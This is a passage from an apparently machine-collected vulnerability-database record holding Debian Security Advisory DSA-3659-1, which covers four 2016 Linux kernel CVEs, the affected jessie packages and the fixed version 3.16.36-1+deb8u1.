"linux-headers-3.16.0-7-armmp-lpae_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-7-armmp-lpae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-5-amd64-dbg_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-5-amd64-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-6-amd64_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-6-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-7-ixp4xx_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-7-ixp4xx", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-all_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-6-all", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-image-3.16.0-7-armmp-lpae_3.16.36-1+deb8u1_all.deb", "packageName": "linux-image-3.16.0-7-armmp-lpae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.36-1+deb8u1", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-686-pae_3.16.36-1+deb8u1_all.deb", "packageName": "linux-headers-3.16.0-4-686-pae", "operator": "lt"}], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3659-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nSeptember 04, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : linux\nCVE ID : CVE-2016-5696 CVE-2016-6136 CVE-2016-6480 CVE-2016-6828\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or have other\nimpacts.\n\nCVE-2016-5696\n\n Yue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V.\n Krishnamurthy of the University of California, Riverside; and Lisa\n M. Marvel of the United States Army Research Laboratory discovered\n that Linux&#x27;s implementation of the TCP Challenge ACK feature\n results in a side channel that can be used to find TCP connections\n between specific IP addresses, and to inject messages into those\n connections.\n\n Where a service is made available through TCP, this may allow\n remote attackers to impersonate another connected user to the\n server or to impersonate the server to another connected user. In\n case the service uses a protocol with message authentication\n (e.g. TLS or SSH), this vulnerability only allows denial of\n service (connection failure). An attack takes tens of seconds, so\n short-lived TCP connections are also unlikely to be vulnerable.\n\n This may be mitigated by increasing the rate limit for TCP\n Challenge ACKs so that it is never exceeded:\n sysctl net.ipv4.tcp_challenge_ack_limit=1000000000\n\nCVE-2016-6136\n\n Pengfei Wang discovered that the audit subsystem has a\n &#x27;double-fetch&#x27; or &#x27;TOCTTOU&#x27; bug in its handling of special\n characters in the name of an executable. Where audit logging of\n execve() is enabled, this allows a local user to generate\n misleading log messages.\n\nCVE-2016-6480\n\n Pengfei Wang discovered that the aacraid driver for Adaptec RAID\n controllers has a &#x27;double-fetch&#x27; or &#x27;TOCTTOU&#x27; bug in its\n validation of &#x27;FIB&#x27; messages passed through the ioctl() system\n call. This has no practical security impact in current Debian\n releases.\n\nCVE-2016-6828\n\n Marco Grassi reported a &#x27;use-after-free&#x27; bug in the TCP\n implementation, which can be triggered by local users. The\n security impact is unclear, but might include denial of service or\n privilege escalation.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 3.16.36-1+deb8u1. In addition, this update contains several\nchanges originally targeted for the upcoming jessie point release.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 1, "reporter": "Debian", "published": "2016-09-04T17:25:13", "title": "[SECURITY] [DSA 3659-1] linux security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:13:31", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-5696", "CVE-2016-6136", "CVE-2016-6828"], "modified": "2016-09-04T17:25:13", "id": "DEBIAN:DSA-3659-1:3F508", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00238.html", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}]}